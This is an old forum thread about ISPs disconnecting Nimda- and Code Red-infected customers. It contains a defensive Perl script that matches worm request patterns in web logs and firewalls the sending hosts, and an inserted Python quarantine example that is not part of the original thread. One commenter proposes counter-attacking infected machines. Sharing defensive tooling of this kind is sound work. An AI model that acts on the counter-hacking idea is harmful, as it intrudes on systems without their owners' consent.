3) M$ "fixes" their problems. More pure bull. M$ historically doesn't "fix" problems - they deny, accuse the evil virus writers, then finally stick band-aids on gaping holes - after suggesting that the users employ unworkable workarounds. The real problems are deeply rooted in fundamental design flaws and cannot truly be fixed without a major overhaul - oh yeah, I guess that would be Windows ME.
If enough users who purchase and use defective software get blown off the internet, then maybe, just maybe we'll see fewer ignorant (not stupid - there's a difference) users blundering down the electronic highways in battle tanks just cause some slick salesman in Seattle told them tanks made great family cars.
When by some mysterious way Code Red infected my non-service-packed, carelessly installed 2000 Server with its DirecPC USB satellite modem, I was disconnected. With no clear message why. Actually they somehow managed to turn off the satellite portion, and the network driver used the modem for in and out (as you may know DirecPC uses the satellite to receive, modem to send) -- so I just noticed a sudden decrease in speed. I finally called them and they required me to go into my Add/Remove Programs and read the exact number of the Qxxxx patch from Microsoft to them before they turned me back on. As I hadn't installed the patch, I couldn't bluff my way through this yet. So I went and got the number, downloaded the patch, and actually installed it. Oh what a pain, but then they just flipped a switch and I was back to pseudo-broadband
Here's part of Speakeasy's statement on the actions they are preparing to take (I'm a residential SDSL customer):
:)
The effects of this worm are detrimental to all and we'd like to give each
member a chance to secure their machines. However, after 9/23/01,
Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any
machine infected with the worm. We apologize for the inconvenience of
this, but it is imperative that we ensure our network is not assisting in
the propagation of this, or any, worm. All of us are part of a larger
community, and it really isn't cool to infect your neighbors.
Makes sense to me
I run Apache off my DSL network at home, but use it for internal dev purposes only and thus have all but a few incoming ports firewalled.
FWIW, here's a Perl hack to stop DoS-type activity caused by the Nimda worm pounding Apache with GET requests; I've been using it on a RedHat 6.2 server with IPChains for two days now, and it works remarkably well.
#!/usr/bin/perl
# IISBLOCK - Infected IIS server blocking utility.
# by Bill Larson of Compu-Net Enterprises.
# http://www.compu.net. This header must be kept intact if you
# wish to redistribute the script.
use strict;
use warnings;

my $check = 0;
my $line = "";
my $dupe = "";
my $weblog = "/etc/www/logs/access_log";
my $infection = "/root/infected";
my $removelist = "/root/fwclean";
# create the removelist file so that you can chmod it later and
# automatically clear the firewall.. chmod 700 iisblock
open (HTFILE3, ">$removelist") or die "Cannot write $removelist: $!";
print HTFILE3 "#!/bin/sh\n";
close(HTFILE3);
# open the web server log file specified above and start processing
open (HTFILE, "<$weblog") or die "Cannot read $weblog: $!";
until (eof (HTFILE))
{
    $line = <HTFILE>;
    chomp ($line);
    # Pattern match on IIS attempts, then strip down to the hostname/IP address:
    # everything from the first " -" onward is dropped, leaving the client field
    # of a common/combined format log line.
    if ($line =~ /.*\/winnt\/system32\/.*/) {
        $line =~ s/\ -.*//gi;
        # refuse to hand anything but a plain host name or IP to the shell below
        if ($line !~ /^[A-Za-z0-9.\-]+$/) { next; }
        # This host is infected so let's do something about it.
        infected();
    }
}
close(HTFILE);

sub infected {
    $check = 0;
    # begin a check to ensure that we only take action once per host.
    # The list file may not exist yet on the first run; treat that as empty.
    if (open (HTFILE2, "<$infection")) {
        until (eof (HTFILE2)) {
            $dupe = <HTFILE2>;
            chomp ($dupe);
            # exact match against the stored host; \Q...\E stops the dots of
            # an IP address from acting as regex wildcards
            if ($line =~ /^\Q$dupe\E$/) {
                $check = 1;
            }
        }
        close(HTFILE2);
    }
    # If this is a unique host continue
    if ($check eq "0") {
        # time to add to the list of infected hosts
        open (HTFILE2, ">>$infection") or die "Cannot append to $infection: $!";
        print HTFILE2 "$line\n";
        close(HTFILE2);
        # add using the specified add command
        # firewall software will print an error on invalid hostnames.
        # Zap them one at a time manually
        system ("/sbin/ipchains -I input -s $line -j DENY -l");
        # write firewall removal line to the remove list file
        # modify this line for your specific firewall software
        open (HTFILE3, ">>$removelist") or die "Cannot append to $removelist: $!";
        print HTFILE3 "/sbin/ipchains -D input -s $line -j DENY -l\n";
        close(HTFILE3);
    }
    # That's all folks!
}
> However you can only use Windows Update if you have a legally purchased copy of Windows...
Uhm, wrong. Perhaps that _might_ be the case with non-Corporate copies of Windows XP, but that's certainly not the case with any other version of Windows. If Windows is installed (and you require a CD Key to install it), then that's all you need.
That's OK, I was getting attacked from a machine owned by a Computer Science Masters Degree student, whose website hosted their resume which spouted all kinds of computer proficiency. I sent them an email, and the machine promptly went offline. Which leads me to wonder what in the hell do they teach CS students these days. And if a CS Masters Degree student is own3d, what makes anyone think Joe 6-pack should not be own3d too.
So is it legal to crack someone else's computer in England? That sounds unlikely.
In the SF Bay Area shut down ALL outbound port 80 for 2-4 hours when this was occurring. It did not matter who you were or what you were running. There is no NT/2K on my network, but they shut me down regardless.
Personally, I think this is ridiculous.
It would seem to me that charging customers based on usage would give them quite an incentive to pay attention to security. Receiving a bill for $10,000 worth of internet traffic is sure to get just about anyone's attention. Right or wrong, our society is driven by money. If you want people to behave responsibly, there has to be a monetary incentive. This might also help people realize that purchasing bug ridden software is a poor investment.
That would makes sense except that the product shipped 2 years late -- one reason being the extensive QA cycle.
Pick your OS and go ahead and hire a small army of QA folks that are paid bug bounties and so on. If you don't find 63,000 issues, somebody's doing something wrong. (I can sit down in front of KDE or Gnome and find 5-10 UI glitches within an hour without even trying.)
For the past 48 hours my XO DSL (formerly concentric) has been blocking port 80 traffic. Originally all port 80 traffic was blocked, and on and off parts have been open, but now outbound is open. But my hosted sites here are down, and have been for nearly 48 hours. Here is a copy of the email I got from xo:
As a consequence of the increased traffic generated by NIMDA worm, XO will
continue to use filters for Internet traffic on some of our networks. We
will continue to monitor these filters and remove them from the network as
the traffic decreases. In addition, we will continue to investigate
alternative options to filter this traffic.
The filters we have recently implemented block the most common methods used
by the worm to spread via the UDP port 69 (used for TFTP or Trivial File
Transfer Protocol) and inbound TCP traffic on port 80 (used for HTTP or
Hyper Text Transfer Protocol). This filter set may prevent others from
accessing sites on your web servers. These filters will remain in place
until the attacks have been brought under control.
XO customers are encouraged to secure their systems. If the worm has
affected a machine on your network, it must be removed from the network and
reformatted. You can find more information on these attacks and available
remedies from the following links, using an alternate Internet connection if
necessary:
Note that even if I was never infected (I wasn't -- mainly I run FreeBSD, and my win32 machines were patched months ago), I have no option to have them turn it on by telling them I'm clean. I confirmed this on the phone, there's nothing I can do. I am going to call and bitch and make them refund part of my monthly fee. This is bullshit.
I can see blocking people who appear to be infected, but blocking everybody? Ick.
-Justin
Just to let everyone know, since Tuesday, XO has been shutting off port 80 to *everyone*, whether they are infected or not. We don't run any NT servers at all, and there's no chance we've been infected by the new worm. I've been hassling with them for a long time trying to get them to unblock port 80 on our BUSINESS ACCOUNT, but to no avail.
When ISPs get into the habit of deciding what content is OK and what content isn't, we are getting into real trouble. And I think they may be exposing themselves to legal liability as well.
"The way Micro$oft behaves is not normal capitalism. Normal capitalism is trying to make money by providing a useful and quality service or product to consumers, preferably in competition with others. Micro$oft's form of capitalism is to try and make as much money as possible and avoid competing with others by any means possible, legal or no, with no regard for any consumer interests other than those that will make them buy M$ products (such as the superficial qualities of speed and good looks)."
I don't know how to break this to you, but what you've described is "normal capitalism". There's a reason those antitrust laws were passed - when they weren't there, the natural economic environment yielded the railroads, Standard Oil and AT&T.
No one really likes normal, unfettered capitalism, which is why most places restrict it.
It's true what you said. But the 63,000 action items speaks something that I find true.
In my opinion, a rich company like Microsoft could do more to assure the quality of its products.
Microsoft Word 2000, for example, is VERY quirky. Also, even after all these versions, it still doesn't allow on-screen kerning. That's not a good record for a very expensive product of which Microsoft has sold millions of copies.
And yet I'm sure you'd be screaming with rage if they were shutting down users that had their Linux boxes compromised and being used to DDoS other sites, preaching that it is yet another attempt by "the man" at taking away your freedom. You're a twit, Taco.
Virus = infected
Worm = infested
at least in meatspace
heh, i wanna see some security holes in Hello, World. I'll bet they're out there!
from an email sent to all speakeasy.net users just the other day:
"The effects of this worm are detrimental to all and we'd like to give each
member a chance to secure their machines. However, after 9/23/01,
Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any
machine infected with the worm. We apologize for the inconvenience of
this, but it is imperative that we ensure our network is not assisting in
the propagation of this, or any, worm. All of us are part of a larger
community, and it really isn't cool to infect your neighbors."
every good
Though I agree with you in principle... I think outlawing web servers or other services is stupid...
If you are infected with NIMDA, then your computer, your connection, is attempting to break into hundreds or thousands of other computers from your connection. I'd shut you off as well; your computer is engaging in otherwise illegal behavior, whether you know about it or not.
If you know about it, then you are responsible.
If you don't, you should.
I think that all around, this is the most effective tactic that can be done.
It's fair - if you're not a problem, you don't get affected. If you are a problem, you're neutralized. No collateral damage.
It works for novice and techie alike - no matter what your experience level, you WILL notice your connection no longer works! And all customers know how to call in to support... and then they can get help at an appropriate skill level, along with some well-deserved admonishment.
It's effective - you don't leave people with really nasty infectious diseases out in the general population, you isolate them. You don't ignore the drunk driver, you slam the sucker in the drunk tank overnight. No, computers do not compare to real lives - but neither does losing your ability to websurf compare to losing your car for a year! In relative terms, it's about equivalent.
It also keeps the infected systems from attacking their neighbors - egress filtering, etc, won't do diddly at the local segment, and I can assure you the routers that cablemodems or DSL modems hook into do NOT have enough brains to act as firewalls as well.
There is indeed a problem with getting patches after... perhaps the best implementation of the cutoff would be to reassign their IP into a quarantine range, which can only access the ISP's fixit site (or other people in the quarantine range).
How you can prove you're properly patched, though, is a tough one. I removed several people from an email list I run because they had Sircam, and I simply had to trust them when they said they'd fixed their systems....
You sit there and talk about how those users SHOULD be cut off from the net because of the worm...well, how would you feel if YOU were cut off!? AND STILL CHARGED FOR IT!?
You sit there all smug in your stupid little Linux world thinking you're God's Gift...well Reality Check...most of the world DOES NOT USE LINUX! Face it buddy, people today use Windows and will continue to use it. It's like trying to teach an old dog new tricks.
The problem here is having your net service shut off... and that's an issue when you're paying for something. You don't walk into a McDonald's, order a Big Mac, pay for it, and then get told you can't eat it. If you for one minute think it's justice for DSL.net to cut the connection, think again. It's a paid service. If I'm paying for something, I'd sure as hell want to have access to it; whether the problem lies with virii is my own problem, not my ISP's.
INS (I am not a sysadmin) which I will now prove...
Couldn't the ISPs in question use the DHCP functionality to force any infected customer's machine to re-login to a specific server, separate and created just for infected users, where the only thing they could access via port 80 would be a fix for the problem virus? I realize that this entails a new level of service, not to mention expense, but the alternative of blocking infected users from access to everything, including the fix, seems unethical at least and possibly illegal as well.
I realize that there would have to be a method to kill each specific DSL connection in order to force a fresh login of each infected user's machine as well as a way to ID each infected machine, but it doesn't seem out of the question.
Anybody out there willing to consider this?
Please, feel free to flame away and tell me how ignorant I am. but don't forget that I already know how ignorant I am, so perhaps you should just focus on answering the question...
and the question is this:
given the solutions that currently exist to run an OS on a virtual machine (i.e. VMware and Virtual PC - even thought VPC won't run under Linux --at least not yet.) one could say that the solution could be to do the following...
Use one container file to be the system drive. use another to be the data drive, and ensure that both are always separate. Create a virutal environment once every month that includes all of the known patches for the OS you run on the OS container. Do all of this offline. Then, save the OS container file to a CD and stick it in a vault.) Using your real OS (the host, in this case) figure out a way to have the host monitor the data being pumped from the guest. If the guest becomes compromised, pull the real machine offline, can the process that is the virutal machine, delete the OS container file, copy the good one from the vault, restart the process that is the guest OS and you're back in business in a pretty short time. Without having to take the actual machines in question down to reformat, reinstall, etc. Because the OS running on the real machines has never been compromised. ) So if you need to run IIS and thus Windows, do it in a virutal machine running under a less crackable OS.
Granted, this doesn't solve the problem of the virtual server being infected, but it does seem to be a way to have the best of both worlds without the gooey mess.
Plus, running XP under a virtual machine is a way to prevent sudden burps from Microsoft's licensing scheme. You will have to connect to the net ONCE or even have to call their 800 number ONCE while you set up the Virtual machine environment before you make your master copy of the OS container file, and as long as you don't mess with the parameters of the virtual machine, you should be okay. I've not tried XP under VirtualPC or VMware, so I don't know if this is possible. And please, buy the damn copy of XP because you respect intellectual property, even if it is owned by idiots. You will still be abiding by the license agreement because you are only running the operating system on one machine, that being the virtual one.
Okay, let the flaming begin. At least it is an idea and quite a bit fresher than the last 50 or so posts in this thread.
Jack Greenwood Southern California Inland Empire Suburban Hell
I know, it's waaaay too late and nobody will read it anyway.
Last week my car had to be inspected, since it had passed the 100.000km threshold. Nothing serious to report, just refilled the front-window-sprayer with water and the tires with air.
Why isn't there a requirement that you have your computer (read: the software running on it) checked for problems every three months so that the latest patches are installed and that you get a report of "what's wrong with it"?
It's time again for the Internet Surfing License!
Auto-expiring after three months and only renewable if it passes the test.
bash$
ISPs could do this much more gracefully and much cheaper. All they need to do is block all non-HTTP traffic, and redirect all attempts to reach sites other than antivirus sites to a page explaining why the measure is in place and what to do about it.
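The "walled garden" that this post and the earlier DHCP re-login suggestion describe, as an added example that is not code from any poster: infected subscribers keep DNS and HTTP to a short list of cleanup sites, every other HTTP request is redirected to an explanation page, and all other ports are dropped. The quarantine page URL, the allowed-host list, the scan threshold and the sample flow records are all assumed or constructed for illustration.

```python
# Added example: a walled-garden quarantine gateway for worm-infected subscribers.
# Hosts are flagged with a crude "many distinct web servers probed in one window"
# heuristic, which is the kind of port-80 sweep Code Red / Nimda produced.
from collections import defaultdict
from ipaddress import ip_address

QUARANTINE_PAGE = "http://quarantine.isp.example/cleanup"                 # hypothetical URL
ALLOWED_HOSTS = {"quarantine.isp.example", "windowsupdate.microsoft.com"}  # assumed list
SCAN_THRESHOLD = 20   # distinct port-80 targets per window that marks a host as scanning


class QuarantineGateway:
    def __init__(self):
        self.quarantined = set()   # customer IPs currently isolated

    def flag_scanners(self, flows):
        """flows: iterable of (src_ip, dst_ip, dst_port) records. Quarantines every
        source that probed more than SCAN_THRESHOLD distinct web servers; returns
        the set of newly flagged addresses."""
        targets = defaultdict(set)
        for src, dst, dport in flows:
            if dport == 80:
                targets[ip_address(src)].add(dst)
        newly = {src for src, dsts in targets.items() if len(dsts) > SCAN_THRESHOLD}
        self.quarantined |= newly
        return newly

    def release(self, customer_ip):
        """Called once support confirms the machine has been cleaned."""
        self.quarantined.discard(ip_address(customer_ip))

    def decide(self, src_ip, dst_host, dst_port):
        """Return (action, reason) for one outbound connection attempt."""
        if ip_address(src_ip) not in self.quarantined:
            return ("allow", "customer not quarantined")
        if dst_port == 53:
            return ("allow", "DNS kept so the redirect page still resolves")
        if dst_port != 80:
            return ("drop", "only HTTP permitted while quarantined")
        if dst_host in ALLOWED_HOSTS:
            return ("allow", "cleanup/patch site")
        return ("redirect", QUARANTINE_PAGE)


# Constructed sample flows: 10.0.0.5 sweeps 25 web servers, 10.0.0.9 just browses.
SAMPLE_FLOWS = [("10.0.0.5", f"192.0.2.{i}", 80) for i in range(1, 26)]
SAMPLE_FLOWS += [("10.0.0.9", "198.51.100.7", 80), ("10.0.0.9", "198.51.100.8", 443)]

if __name__ == "__main__":
    gw = QuarantineGateway()
    print("flagged:", gw.flag_scanners(SAMPLE_FLOWS))
    print(gw.decide("10.0.0.5", "slashdot.org", 80))   # redirected to the cleanup page
    print(gw.decide("10.0.0.9", "slashdot.org", 80))   # allowed, not quarantined
```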
I run a k12 network in (cough), where there are two people responsible for a three hundred host LAN. We have a couple people come in over the summer to help with stuff but the kids have proven to be irresponsible and abusive (it's a private hi$ school), and cannot be trusted to help more than harm.
We must use M$ clients-there is no option for the uneducated users and teachers we try to support.
There is rarely a day with any spare time for patching the M$ boxes-we get by with default installs, some basic host based prot. software, a proxy/firewall and the windoze update. We barely have time to update virus definitions, and when they lapse we get no notice from the teachers and staff. Our internet access is a leased line that was arranged on a budget sharing a congested port and single T1 with 12 other affiliated schools through a college isp run by an understaffed IT dept. We were badly infected by the nimda virus.
I get sick of hearing self righteous asses declare the simplicity of "keeping up to date".
It's BS-you can barely keep everything running and some users in line and out of trouble.
whack a mole... hahahahahahah... That's hilarious.
mov ax, 13h
int 10h
It all depends on how cynical you want to be.
Me, I like to think that those laws reflect what we would like capitalism to be like, and that that is what should be called "normal" capitalism.
But regardless of what you want to call it, Micro$oft does behave like that, and it is a lot worse than most other companies, and it is also so bad that it warrants spelling Micro$oft with a $, which is what we were talking about...
Microsoft's Critical Update Notification program, available at windowsupdate, gets added to Scheduled Tasks and does exactly what Oilchange, AutoUpdate, etc. do, but just for critical Windows updates.
you fucking asshole.
READ YOURSELF YOU STUPID DIPSHIT!
WHAT THE FUck IS WRONG WITH YOU.
Why can't strategies like this be targeted at spammers? That would REALLY make the world a better place...
It seems that it should be possible to write a program that waits for compromised systems to attack them and then re-infect the machines with a patch or at least something that prevents further attacks. I mean, these are compromised systems right? They should still be vulnerable. Why can't the good guys use the tools of the bad guys?